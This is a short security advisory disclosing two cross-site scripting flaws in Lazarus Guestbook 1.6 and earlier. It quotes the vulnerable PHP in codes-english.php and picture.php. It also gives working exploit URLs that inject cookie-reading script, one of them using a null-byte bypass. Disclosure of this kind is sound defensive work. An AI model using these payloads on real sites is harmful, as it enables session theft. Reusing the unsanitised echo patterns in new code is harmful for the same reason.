Produce : Lazarus Guestbook Website : http://carbonize.co.uk/Lazarus/ Version : <= 1.6 Problem : Cross Site Scripting 1) The first probleme is in codes-english.php ,"show" parameter in lang/codes-english.php isn't properly sanitised This can be exploited to execute arbitrary HTML and javascript code Vulnerable code in lang/codes-english.php near line 4 1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 <html> 3 <head> 4 <title><?php echo($_GET['show']); ?></title> Exploit : http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E[XSS] http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E<script>alert(document.cookie);</script> 2) the seconde probleme is in picture.php , the script verifiy fist if image file exists after it display it , vulnerable code : in picture.php ******************************** 24 if (!empty($_GET['img'])) { 26 if (file_exists("$GB_TMP/$_GET[img]")) { 27 $size = @GetImageSize("$GB_TMP/$_GET[img]"); 28 $picture = "$GB_PG[base_url]/$GB_TMP/$_GET[img]"; 29 } .. ............ 49 <td align="center" valign="middle"> 50 <?php 51 if (!empty($_GET['img']) && is_array($size)) { 52 echo "<a href=\"javascript:window.close()\"><img src=\"$picture\" width=\"$size[0]\" height=\"$size[1]\" border=\"0\"></a>\n"; 53 } 54 ?> 55 </td> **************** if magic_quote_gpc = OFF we can bypass this protection by specifing existing image file ( Exemple : "img/home.gif") and using a nullchar ( %00 ) POC : http://localhost/lazarusgb/picture.php?img=../img/home.gif%00[code] file_exists("$GB_TMP/$_GET[img]") will return true and html code will be executed Exploit: http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E[XSS] http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E<script>alert(document.cookie);</script> Contact : simo64[at]gmail[dot]com Moroccan Security Research Team
